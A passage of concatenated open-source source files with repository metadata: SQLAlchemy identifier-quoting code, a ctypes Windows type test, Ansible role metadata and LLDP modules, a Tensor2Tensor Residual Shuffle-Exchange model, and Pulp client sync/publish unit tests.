"type on this Column?" % type_)
def visit_type_decorator(self, type_):
return self.process(type_.type_engine(self.dialect))
def visit_user_defined(self, type_):
return type_.get_col_spec()
class IdentifierPreparer(object):
"""Handle quoting and case-folding of identifiers based on options."""
reserved_words = RESERVED_WORDS
legal_characters = LEGAL_CHARACTERS
illegal_initial_characters = ILLEGAL_INITIAL_CHARACTERS
def __init__(self, dialect, initial_quote='"',
final_quote=None, escape_quote='"', omit_schema=False):
"""Construct a new ``IdentifierPreparer`` object.
initial_quote
Character that begins a delimited identifier.
final_quote
Character that ends a delimited identifier. Defaults to
`initial_quote`.
omit_schema
Prevent prepending schema name. Useful for databases that do
not support schemae.
"""
self.dialect = dialect
self.initial_quote = initial_quote
self.final_quote = final_quote or self.initial_quote
self.escape_quote = escape_quote
self.escape_to_quote = self.escape_quote * 2
self.omit_schema = omit_schema
self._strings = {}
def _escape_identifier(self, value):
"""Escape an identifier.
Subclasses should override this to provide database-dependent
escaping behavior.
"""
return value.replace(self.escape_quote, self.escape_to_quote)
def _unescape_identifier(self, value):
"""Canonicalize an escaped identifier.
Subclasses should override this to provide database-dependent
unescaping behavior that reverses _escape_identifier.
"""
return value.replace(self.escape_to_quote, self.escape_quote)
def quote_identifier(self, value):
"""Quote an identifier.
Subclasses should override this to provide database-dependent
quoting behavior.
"""
return self.initial_quote + \
self._escape_identifier(value) + \
self.final_quote
def _requires_quotes(self, value):
"""Return True if the given identifier requires quoting."""
lc_value = value.lower()
return (lc_value in self.reserved_words
or value[0] in self.illegal_initial_characters
or not self.legal_characters.match(util.text_type(value))
or (lc_value != value))
def quote_schema(self, schema, force=None):
"""Conditionally quote a schema.
Subclasses can override this to provide database-dependent
quoting behavior for schema names.
the 'force' flag should be considered deprecated.
"""
return self.quote(schema, force)
def quote(self, ident, force=None):
"""Conditionally quote an identifier.
the 'force' flag should be considered deprecated.
"""
force = getattr(ident, "quote", None)
if force is None:
if ident in self._strings:
return self._strings[ident]
else:
if self._requires_quotes(ident):
self._strings[ident] = self.quote_identifier(ident)
else:
self._strings[ident] = ident
return self._strings[ident]
elif force:
return self.quote_identifier(ident)
else:
return ident
def format_sequence(self, sequence, use_schema=True):
name = self.quote(sequence.name)
if not self.omit_schema and use_schema and sequence.schema is not None:
name = self.quote_schema(sequence.schema) + "." + name
return name
def format_label(self, label, name=None):
return self.quote(name or label.name)
def format_alias(self, alias, name=None):
return self.quote(name or alias.name)
def format_savepoint(self, savepoint, name=None):
return self.quote(name or savepoint.ident)
def format_constraint(self, constraint):
return self.quote(constraint.name)
def format_table(self, table, use_schema=True, name=None):
"""Prepare a quoted table and schema name."""
if name is None:
name = table.name
result = self.quote(name)
if not self.omit_schema and use_schema \
and getattr(table, "schema", None):
result = self.quote_schema(table.schema) + "." + result
return result
def format_schema(self, name, quote=None):
"""Prepare a quoted schema name."""
return self.quote(name, quote)
def format_column(self, column, use_table=False,
name=None, table_name=None):
"""Prepare a quoted column name."""
if name is None:
name = column.name
if not getattr(column, 'is_literal', False):
if use_table:
return self.format_table(
column.table, use_schema=False,
name=table_name) + "." + self.quote(name)
else:
return self.quote(name)
else:
# literal textual elements get stuck into ColumnClause a lot,
# which shouldn't get quoted
if use_table:
return self.format_table(column.table,
use_schema=False, name=table_name) + '.' + name
else:
return name
def format_table_seq(self, table, use_schema=True):
"""Format table name and schema as a tuple."""
# Dialects with more levels in their fully qualified references
# ('database', 'owner', etc.) could override this and return
# a longer sequence.
if not self.omit_schema and use_schema and \
getattr(table, 'schema', None):
return (self.quote_schema(table.schema),
self.format_table(table, use_schema=False))
else:
return (self.format_table(table, use_schema=False), )
@util.memoized_property
def _r_identifiers(self):
initial, final, escaped_final = \
[re.escape(s) for s in
(self.initial_quote, self.final_quote,
self._escape_identifier(self.final_quote))]
r = re.compile(
r'(?:'
r'(?:%(initial)s((?:%(escaped)s|[^%(final)s])+)%(final)s'
r'|([^\.]+))(?=\.|$))+' %
{'initial': initial,
'final': final,
'escaped': escaped_final})
return r
def unformat_identifiers(self, identifiers):
"""Unpack 'schema.table.column'-like strings into components."""
r = self._r_identifiers
return [self._unescape_identifier(i)
for i in [a or b for a, b in r.findall(identifiers)]]
| mit |
FireWRT/OpenWrt-Firefly-Libraries | staging_dir/host/lib/python2.7/ctypes/test/test_wintypes.py | 134 | 1466 | import sys
import unittest
from ctypes import *
@unittest.skipUnless(sys.platform.startswith('win'), 'Windows-only test')
class WinTypesTest(unittest.TestCase):
def test_variant_bool(self):
from ctypes import wintypes
# reads 16-bits from memory, anything non-zero is True
for true_value in (1, 32767, 32768, 65535, 65537):
true = POINTER(c_int16)(c_int16(true_value))
value = cast(true, POINTER(wintypes.VARIANT_BOOL))
self.assertEqual(repr(value.contents), 'VARIANT_BOOL(True)')
vb = wintypes.VARIANT_BOOL()
self.assertIs(vb.value, False)
vb.value = True
self.assertIs(vb.value, True)
vb.value = true_value
self.assertIs(vb.value, True)
for false_value in (0, 65536, 262144, 2**33):
false = POINTER(c_int16)(c_int16(false_value))
value = cast(false, POINTER(wintypes.VARIANT_BOOL))
self.assertEqual(repr(value.contents), 'VARIANT_BOOL(False)')
# allow any bool conversion on assignment to value
for set_value in (65536, 262144, 2**33):
vb = wintypes.VARIANT_BOOL()
vb.value = set_value
self.assertIs(vb.value, True)
vb = wintypes.VARIANT_BOOL()
vb.value = [2, 3]
self.assertIs(vb.value, True)
vb.value = []
self.assertIs(vb.value, False)
if __name__ == "__main__":
unittest.main()
| gpl-2.0 |
goozbach/ansible | lib/ansible/playbook/role/metadata.py | 64 | 3373 | # (c) 2014 Michael DeHaan, <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.compat.six import iteritems, string_types
from ansible.errors import AnsibleParserError
from ansible.playbook.attribute import Attribute, FieldAttribute
from ansible.playbook.base import Base
from ansible.playbook.helpers import load_list_of_roles
from ansible.playbook.role.include import RoleInclude
__all__ = ['RoleMetadata']
class RoleMetadata(Base):
'''
This class wraps the parsing and validation of the optional metadata
within each Role (meta/main.yml).
'''
_allow_duplicates = FieldAttribute(isa='bool', default=False)
_dependencies = FieldAttribute(isa='list', default=[])
_galaxy_info = FieldAttribute(isa='GalaxyInfo')
def __init__(self, owner=None):
self._owner = owner
super(RoleMetadata, self).__init__()
@staticmethod
def load(data, owner, variable_manager=None, loader=None):
'''
Returns a new RoleMetadata object based on the datastructure passed in.
'''
if not isinstance(data, dict):
raise AnsibleParserError("the 'meta/main.yml' for role %s is not a dictionary" % owner.get_name())
m = RoleMetadata(owner=owner).load_data(data, variable_manager=variable_manager, loader=loader)
return m
def _load_dependencies(self, attr, ds):
'''
This is a helper loading function for the dependencies list,
which returns a list of RoleInclude objects
'''
if ds is None:
ds = []
current_role_path = None
if self._owner:
current_role_path = os.path.dirname(self._owner._role_path)
try:
return load_list_of_roles(ds, play=self._owner._play, current_role_path=current_role_path, variable_manager=self._variable_manager, loader=self._loader)
except AssertionError:
raise AnsibleParserError("A malformed list of role dependencies was encountered.", obj=self._ds)
def _load_galaxy_info(self, attr, ds):
'''
This is a helper loading function for the galaxy info entry
in the metadata, which returns a GalaxyInfo object rather than
a simple dictionary.
'''
return ds
def serialize(self):
return dict(
allow_duplicates = self._allow_duplicates,
dependencies = self._dependencies,
)
def deserialize(self, data):
setattr(self, 'allow_duplicates', data.get('allow_duplicates', False))
setattr(self, 'dependencies', data.get('dependencies', []))
| gpl-3.0 |
dharmabumstead/ansible | lib/ansible/modules/net_tools/lldp.py | 103 | 2499 | #!/usr/bin/python
#
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: lldp
requirements: [ lldpctl ]
version_added: 1.6
short_description: get details reported by lldp
description:
- Reads data out of lldpctl
options: {}
author: "Andy Hill (@andyhky)"
notes:
- Requires lldpd running and lldp enabled on switches
'''
EXAMPLES = '''
# Retrieve switch/port information
- name: Gather information from lldp
lldp:
- name: Print each switch/port
debug:
msg: "{{ lldp[item]['chassis']['name'] }} / {{ lldp[item]['port']['ifname'] }}"
with_items: "{{ lldp.keys() }}"
# TASK: [Print each switch/port] ***********************************************************
# ok: [10.13.0.22] => (item=eth2) => {"item": "eth2", "msg": "switch1.example.com / Gi0/24"}
# ok: [10.13.0.22] => (item=eth1) => {"item": "eth1", "msg": "switch2.example.com / Gi0/3"}
# ok: [10.13.0.22] => (item=eth0) => {"item": "eth0", "msg": "switch3.example.com / Gi0/3"}
'''
from ansible.module_utils.basic import AnsibleModule
def gather_lldp(module):
cmd = ['lldpctl', '-f', 'keyvalue']
rc, output, err = module.run_command(cmd)
if output:
output_dict = {}
current_dict = {}
lldp_entries = output.split("\n")
for entry in lldp_entries:
if entry.startswith('lldp'):
path, value = entry.strip().split("=", 1)
path = path.split(".")
path_components, final = path[:-1], path[-1]
else:
value = current_dict[final] + '\n' + entry
current_dict = output_dict
for path_component in path_components:
current_dict[path_component] = current_dict.get(path_component, {})
current_dict = current_dict[path_component]
current_dict[final] = value
return output_dict
def main():
module = AnsibleModule({})
lldp_output = gather_lldp(module)
try:
data = {'lldp': lldp_output['lldp']}
module.exit_json(ansible_facts=data)
except TypeError:
module.fail_json(msg="lldpctl command failed. is lldpd running?")
if __name__ == '__main__':
main()
| gpl-3.0 |
tensorflow/tensor2tensor | tensor2tensor/models/research/residual_shuffle_exchange.py | 1 | 8731 | # coding=utf-8
# Copyright 2021 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Residual Shuffle-Exchange Network.
Implementation of
"Residual Shuffle-Exchange Networks for Fast Processing of Long Sequences"
paper by A.Draguns, E.Ozolins, A.Sostaks, M.Apinis, K.Freivalds.
Paper: https://arxiv.org/abs/2004.04662
Original code: https://github.com/LUMII-Syslab/RSE
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensor2tensor.layers.common_layers import gelu
from tensor2tensor.models.research.shuffle_network import reverse_shuffle_layer
from tensor2tensor.models.research.shuffle_network import shuffle_layer
from tensor2tensor.models.research.shuffle_network import ShuffleNetwork
from tensor2tensor.utils import registry
import tensorflow.compat.v1 as tf
class LayerNormalization(tf.keras.layers.Layer):
"""Layer Normalization (LayerNorm) without output bias and gain."""
def __init__(self, axis=1, epsilon=1e-10, **kwargs):
"""Initialize Layer Normalization layer.
Args:
axis: Tuple or number of axis for calculating mean and variance
epsilon: Small epsilon to avoid division by zero
**kwargs: keyword args passed to super.
"""
self.axis = axis
self.epsilon = epsilon
self.bias = None
super(LayerNormalization, self).__init__(**kwargs)
def build(self, input_shape):
"""Initialize bias weights for layer normalization.
Args:
input_shape: shape of input tensor
"""
num_units = input_shape.as_list()[-1]
self.bias = self.add_weight(
"bias", [1, 1, num_units], initializer=tf.zeros_initializer)
super(LayerNormalization, self).build(input_shape)
def call(self, inputs, **kwargs):
"""Apply Layer Normalization without output bias and gain.
Args:
inputs: tensor to be normalized. Axis should be smaller than input tensor
dimensions.
**kwargs: more arguments (unused)
Returns:
tensor output.
"""
inputs -= tf.reduce_mean(inputs, axis=self.axis, keepdims=True)
inputs += self.bias
variance = tf.reduce_mean(tf.square(inputs), self.axis, keepdims=True)
return inputs * tf.math.rsqrt(variance + self.epsilon)
def inv_sigmoid(y):
"""Inverse sigmoid function.
Args:
y: float in range 0 to 1
Returns:
the inverse sigmoid.
"""
return np.log(y / (1 - y))
class RSU(tf.keras.layers.Layer):
"""Residual Switch Unit of Residual Shuffle-Exchange network."""
def __init__(self, prefix, dropout, mode, **kwargs):
"""Initialize Switch Layer.
Args:
prefix: Name prefix for switch layer
dropout: Dropout rate
mode: Training mode
**kwargs: more arguments (unused)
"""
super().__init__(**kwargs)
self.prefix = prefix
self.dropout = dropout
self.mode = mode
self.first_linear = None
self.second_linear = None
self.layer_norm = None
self.residual_scale = None
residual_weight = 0.9
self.candidate_weight = np.sqrt(1 - residual_weight**2) * 0.25
self.init_value = inv_sigmoid(residual_weight)
def build(self, input_shape):
"""Initialize layer weights and sublayers.
Args:
input_shape: shape of inputs
"""
in_units = input_shape[-1]
middle_units = in_units * 4
out_units = in_units * 2
init = tf.variance_scaling_initializer(
scale=1.0, mode="fan_avg", distribution="uniform")
self.first_linear = tf.keras.layers.Dense(
middle_units,
use_bias=False,
kernel_initializer=init,
name=self.prefix + "/cand1")
self.second_linear = tf.keras.layers.Dense(
out_units, kernel_initializer=init, name=self.prefix + "/cand2")
self.layer_norm = LayerNormalization()
init = tf.constant_initializer(self.init_value)
self.residual_scale = self.add_weight(
self.prefix + "/residual", [out_units], initializer=init)
super(RSU, self).build(input_shape)
def call(self, inputs, **kwargs):
"""Apply Residual Switch Layer to inputs.
Args:
inputs: Input tensor.
**kwargs: unused kwargs.
Returns:
tf.Tensor: New candidate value
"""
del kwargs
input_shape = tf.shape(inputs)
batch_size = input_shape[0]
length = input_shape[1]
num_units = inputs.shape.as_list()[2]
n_bits = tf.log(tf.cast(length - 1, tf.float32)) / tf.log(2.0)
n_bits = tf.floor(n_bits) + 1
reshape_shape = [batch_size, length // 2, num_units * 2]
reshaped_inputs = tf.reshape(inputs, reshape_shape)
first_linear = self.first_linear(reshaped_inputs)
first_linear = self.layer_norm(first_linear)
first_linear = gelu(first_linear)
candidate = self.second_linear(first_linear)
residual = tf.sigmoid(self.residual_scale) * reshaped_inputs
candidate = residual + candidate * self.candidate_weight
candidate = tf.reshape(candidate, input_shape)
if self.dropout > 0:
candidate = tf.nn.dropout(candidate, rate=self.dropout / n_bits)
if self.dropout != 0.0 and self.mode == tf.estimator.ModeKeys.TRAIN:
noise = tf.random_normal(tf.shape(candidate), mean=1.0, stddev=0.001)
candidate = candidate * noise
return candidate
def residual_shuffle_network(inputs, hparams):
"""Residual Shuffle-Exchange network with weight sharing.
Args:
inputs: inputs to the Shuffle-Exchange network. Should be in length of power
of 2.
hparams: Model configuration
Returns:
tf.Tensor: Outputs of the Shuffle-Exchange last layer
"""
input_shape = tf.shape(inputs)
n_bits = tf.log(tf.cast(input_shape[1] - 1, tf.float32)) / tf.log(2.0)
n_bits = tf.cast(n_bits, tf.int32) + 1
block_out = inputs
for k in range(hparams.num_hidden_layers):
with tf.variable_scope("benes_block_" + str(k), reuse=tf.AUTO_REUSE):
forward_output = forward_part(block_out, hparams, n_bits)
block_out = reverse_part(forward_output, hparams, n_bits)
return RSU("last_layer", hparams.dropout, hparams.mode)(block_out)
def reverse_part(inputs, hparams, n_bits):
"""Reverse part of Benes block.
Repeatably applies interleaved Residual Switch layer and Reverse Shuffle
Layer. One set of weights used for all Switch layers.
Args:
inputs: inputs for reverse part. Should be outputs from forward part.
hparams: params of the network.
n_bits: count of repeated layer applications.
Returns:
tf.Tensor: output of reverse part.
"""
reverse_rsu = RSU("reverse_switch", hparams.dropout, hparams.mode)
def reverse_step(state, _):
with tf.variable_scope("reverse"):
new_state = reverse_rsu(state)
return reverse_shuffle_layer(new_state)
reverse_outputs = tf.scan(
reverse_step,
tf.range(n_bits, n_bits * 2),
initializer=inputs,
parallel_iterations=1,
swap_memory=True)
return reverse_outputs[-1, :, :, :]
def forward_part(block_out, hparams, n_bits):
"""Forward part of Benes block.
Repeatably applies interleaved Residual Switch layer and Shuffle
Layer. One set of weights used for all Switch layers.
Args:
block_out: TODO(authors) document.
hparams: params of the network.
n_bits: count of repeated layer applications.
Returns:
tf.Tensor: output of forward part.
"""
forward_rsu = RSU("switch", hparams.dropout, hparams.mode)
def forward_step(state, _):
with tf.variable_scope("forward"):
new_state = forward_rsu(state)
return shuffle_layer(new_state)
forward_outputs = tf.scan(
forward_step,
tf.range(0, n_bits),
initializer=block_out,
parallel_iterations=1,
swap_memory=True)
return forward_outputs[-1, :, :, :]
@registry.register_model
class ResidualShuffleExchange(ShuffleNetwork):
"""T2T implementation of Residual Shuffle-Exchange network."""
def body(self, features):
"""Body of Residual Shuffle-Exchange network.
Args:
features: dictionary of inputs and targets
Returns:
the network output.
"""
inputs = tf.squeeze(features["inputs"], axis=2)
logits = residual_shuffle_network(inputs, self._hparams)
return tf.expand_dims(logits, axis=2)
| apache-2.0 |
nthien/pulp | client_lib/test/unit/client/commands/repo/test_sync_publish.py | 7 | 23765 | """
Testing this stuff is a nightmare. To ease the pain, these tests only cover the
commands themselves and ensure they call into the status rendering module. The
status module itself will be tested apart from what happens in the commands.
"""
import copy
import unittest
import mock
from pulp.bindings import responses
from pulp.client.commands import options, polling
from pulp.client.commands.repo import sync_publish as sp
from pulp.client.extensions.core import TAG_TITLE
from pulp.client.extensions.extensions import PulpCliOption
from pulp.common import tags
from pulp.devel.unit import base
CALL_REPORT_TEMPLATE = {
"exception": None,
"task_id": 'default-id',
"tags": ['pulp:action:sync'],
"start_time": None,
"traceback": None,
"state": None,
"finish_time": None,
"schedule_id": None,
"result": None,
"progress_report": {},
}
class GetRepoTasksTests(unittest.TestCase):
"""
Tests for the _get_repo_tasks() function.
"""
def test_publish_action(self):
"""
Test with action set to 'publish'.
"""
context = mock.MagicMock()
a_task = mock.MagicMock()
context.server.tasks_search.search.return_value = [a_task]
repo_id = 'some_repo'
action = 'publish'
tasks = sp._get_repo_tasks(context, repo_id, action)
self.assertEqual(tasks, [a_task])
expected_repo_tag = tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id)
expected_action_tag = tags.action_tag(tags.ACTION_PUBLISH_TYPE)
expected_search_criteria = {
'filters': {'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [expected_repo_tag, expected_action_tag]}}}
context.server.tasks_search.search.assert_called_once_with(**expected_search_criteria)
def test_sync_action(self):
"""
Test with action set to 'sync'.
"""
context = mock.MagicMock()
a_task = mock.MagicMock()
context.server.tasks_search.search.return_value = [a_task]
repo_id = 'some_repo'
action = 'sync'
tasks = sp._get_repo_tasks(context, repo_id, action)
self.assertEqual(tasks, [a_task])
expected_repo_tag = tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id)
expected_action_tag = tags.action_tag(tags.ACTION_SYNC_TYPE)
expected_search_criteria = {
'filters': {'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [expected_repo_tag, expected_action_tag]}}}
context.server.tasks_search.search.assert_called_once_with(**expected_search_criteria)
def test_unsupported_action(self):
"""
Test with action set to neither sync or publish.
"""
context = mock.MagicMock()
a_task = mock.MagicMock()
context.server.tasks_search.search.return_value = [a_task]
repo_id = 'some_repo'
action = 'unsupported'
self.assertRaises(ValueError, sp._get_repo_tasks, context, repo_id, action)
class SyncPublishCommandTests(base.PulpClientTests):
"""
Tests for the SyncPublishCommand class.
"""
@mock.patch('pulp.client.commands.polling.PollingCommand.__init__',
side_effect=polling.PollingCommand.__init__, autospec=True)
def test__init___method_set(self, __init__):
"""
Test the __init__() method when method is set.
"""
name = 'some_name'
description = 'some_description'
method = mock.MagicMock()
context = mock.MagicMock()
renderer = mock.MagicMock()
spc = sp.SyncPublishCommand(name, description, method, context, renderer)
self.assertEqual(spc.renderer, renderer)
self.assertEqual(spc.context, context)
self.assertEqual(spc.prompt, context.prompt)
self.assertTrue(options.OPTION_REPO_ID in spc.options)
__init__.assert_called_once_with(spc, name, description, method, context)
@mock.patch('pulp.client.commands.polling.PollingCommand.__init__',
side_effect=polling.PollingCommand.__init__, autospec=True)
def test__init___method_unset(self, __init__):
"""
Test the __init__() method when method is None.
"""
name = 'some_name'
description = 'some_description'
method = None
context = mock.MagicMock()
renderer = mock.MagicMock()
# Because the SyncPublishCommand does not have a run() method, we need to make and test a
# subclass of it that has a run() method to ensure that method defaults to run() when is is
# None.
class TestSubclass(sp.SyncPublishCommand):
def run(self):
pass
spc = TestSubclass(name, description, method, context, renderer)
self.assertEqual(spc.renderer, renderer)
self.assertEqual(spc.context, context)
self.assertEqual(spc.prompt, context.prompt)
self.assertTrue(options.OPTION_REPO_ID in spc.options)
# When method is None, self.run should have been used instead
__init__.assert_called_once_with(spc, name, description, spc.run, context)
class RunSyncRepositoryCommandTests(base.PulpClientTests):
"""
Test the RunSyncRepositoryCommand class.
"""
def setUp(self):
super(RunSyncRepositoryCommandTests, self).setUp()
self.mock_renderer = mock.MagicMock()
self.command = sp.RunSyncRepositoryCommand(self.context, self.mock_renderer)
def test_progress(self):
"""
Test the progress() method with a progress_report.
"""
progress_report = {'some': 'data'}
task = responses.Task({'progress_report': progress_report})
spinner = mock.MagicMock()
self.command.progress(task, spinner)
self.mock_renderer.display_report.assert_called_once_with(progress_report)
def test_progress_no_progress(self):
"""
Test the progress() method when the Task does not have any progress_report.
"""
task = responses.Task({})
spinner = mock.MagicMock()
self.command.progress(task, spinner)
self.assertEqual(self.mock_renderer.display_report.call_count, 0)
def test_progress_failed_task(self):
"""
Test the progress() method when the Task failed. In this case, the
error will be rendered by the generic failure handler.
"""
progress_report = {'some': 'data'}
task = responses.Task({'progress_report': progress_report})
task.state = responses.STATE_ERROR
spinner = mock.MagicMock()
self.command.progress(task, spinner)
self.assertEqual(self.mock_renderer.display_report.call_count, 0)
def test_structure(self):
# Ensure all of the expected options are there
found_option_keywords = set([o.keyword for o in self.command.options])
expected_option_keywords = set([options.OPTION_REPO_ID.keyword,
polling.FLAG_BACKGROUND.keyword])
self.assertEqual(found_option_keywords, expected_option_keywords)
# Ensure the correct method is wired up
self.assertEqual(self.command.method, self.command.run)
# Ensure the correct metadata
self.assertEqual(self.command.name, 'run')
self.assertEqual(self.command.description, sp.DESC_SYNC_RUN)
@mock.patch('pulp.client.commands.repo.sync_publish.RunSyncRepositoryCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
@mock.patch('pulp.bindings.repository.RepositoryActionsAPI.sync')
def test_run(self, mock_sync, mock_search, poll):
"""
Test the run() method when there is not an existing sync Task on the server.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id, polling.FLAG_BACKGROUND.keyword: False}
# No tasks are running
mock_search.return_value = []
# responses.Response from the sync call
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task = responses.Task(task_data)
mock_sync.return_value = responses.Response(202, task)
self.command.run(**data)
mock_sync.assert_called_once_with(repo_id, None)
sync_tasks = poll.mock_calls[0][1][0]
poll.assert_called_once_with(sync_tasks, data)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_SYNC_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
self.assertEqual(self.prompt.get_write_tags(), [TAG_TITLE])
@mock.patch('pulp.client.commands.repo.sync_publish.RunSyncRepositoryCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
@mock.patch('pulp.bindings.repository.RepositoryActionsAPI.sync')
def test_run_already_in_progress(self, mock_sync, mock_search, poll):
"""
Test the run() method when there is an existing sync Task on the server.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id, polling.FLAG_BACKGROUND.keyword: False}
# Simulate a task already running
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task_data['state'] = 'running'
task = responses.Task(task_data)
mock_search.return_value = [task]
self.command.run(**data)
self.assertEqual(mock_sync.call_count, 0)
sync_tasks = poll.mock_calls[0][1][0]
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_SYNC_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
poll.assert_called_once_with(sync_tasks, data)
write_tags = self.prompt.get_write_tags()
self.assertEqual(2, len(write_tags))
self.assertEqual(write_tags[1], 'in-progress')
@mock.patch('pulp.client.commands.repo.sync_publish.RunSyncRepositoryCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
@mock.patch('pulp.bindings.repository.RepositoryActionsAPI.sync')
def test_run_background(self, mock_sync, mock_search, mock_poll):
"""
Test the run() method when the --bg flag is set.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id, polling.FLAG_BACKGROUND.keyword: True}
# No tasks are running
mock_search.return_value = []
# responses.Response from the sync call
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task = responses.Task(task_data)
mock_sync.return_value = responses.Response(202, task)
self.command.run(**data)
mock_sync.assert_called_once_with(repo_id, None)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_SYNC_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
mock_poll.assert_called_once_with([task], data)
def test_task_header(self):
"""
The task_header() method only passes to avoid the superclass's behavior, so this test just
gets us to 100% coverage.
"""
self.command.task_header(mock.MagicMock())
class SyncStatusCommand(base.PulpClientTests):
def setUp(self):
super(SyncStatusCommand, self).setUp()
self.renderer = mock.MagicMock()
self.command = sp.SyncStatusCommand(self.context, self.renderer)
def test_structure(self):
# Ensure all of the expected options are there
found_options = set(self.command.options)
expected_options = set([options.OPTION_REPO_ID, polling.FLAG_BACKGROUND])
self.assertEqual(found_options, expected_options)
# Ensure the correct method is wired up
self.assertEqual(self.command.method, self.command.run)
# Ensure the correct metadata
self.assertEqual(self.command.name, 'status')
self.assertEqual(self.command.description, sp.DESC_SYNC_STATUS)
@mock.patch('pulp.client.commands.repo.sync_publish.SyncStatusCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
def test_run(self, mock_search, poll):
"""
Test the run() method when the server has one incomplete sync task.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id}
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task_data['state'] = 'running'
task = responses.Task(task_data)
mock_search.return_value = [task]
self.command.run(**data)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_SYNC_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
sync_tasks = poll.mock_calls[0][1][0]
poll.assert_called_once_with(sync_tasks, data)
@mock.patch('pulp.client.commands.repo.sync_publish.PublishStatusCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
def test_run_no_status(self, mock_search, mock_poll):
"""
Test run() when there are no sync_tasks on the server.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id}
# No tasks are running
mock_search.return_value = []
self.command.run(**data)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_SYNC_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
self.assertEqual(0, mock_poll.call_count)
self.assertEqual(self.prompt.get_write_tags(), [TAG_TITLE, 'no-tasks'])
class StatusRendererTests(unittest.TestCase):
def test_default_display_report(self):
# Setup
mock_context = mock.MagicMock()
mock_prompt = mock.MagicMock()
mock_context.prompt = mock_prompt
# Test
sr = sp.StatusRenderer(mock_context)
self.assertRaises(NotImplementedError, sr.display_report, None)
# Verify
self.assertTrue(sr.context is mock_context)
self.assertTrue(sr.prompt is mock_prompt)
class RunPublishRepositoryCommandTests(base.PulpClientTests):
def setUp(self):
super(RunPublishRepositoryCommandTests, self).setUp()
self.mock_renderer = mock.MagicMock()
self.command = sp.RunPublishRepositoryCommand(self.context, self.mock_renderer,
distributor_id='yum_distributor')
self.sample_option1 = PulpCliOption('--sample-option1', "sample_option1", required=False)
self.sample_option2 = PulpCliOption('--sample-option2', "sample_option2", required=False)
self.additional_publish_options = [self.sample_option1, self.sample_option2]
def test_structure(self):
# Ensure all of the expected options are there
self.command = sp.RunPublishRepositoryCommand(
self.context, self.mock_renderer, distributor_id='yum_distributor',
override_config_options=self.additional_publish_options)
found_option_keywords = set([o.keyword for o in self.command.options])
found_group_option_keywords = set(
[o.keyword for o in self.command.option_groups[0].options])
expected_option_keywords = set([options.OPTION_REPO_ID.keyword,
polling.FLAG_BACKGROUND.keyword])
expected_group_option_keywords = set([self.sample_option1.keyword,
self.sample_option2.keyword])
self.assertEqual(found_option_keywords, expected_option_keywords)
self.assertEqual(found_group_option_keywords, expected_group_option_keywords)
# Ensure the correct method is wired up
self.assertEqual(self.command.method, self.command.run)
# Ensure the correct metadata
self.assertEqual(self.command.name, 'run')
self.assertEqual(self.command.description, sp.DESC_PUBLISH_RUN)
@mock.patch('pulp.client.commands.repo.sync_publish.RunPublishRepositoryCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
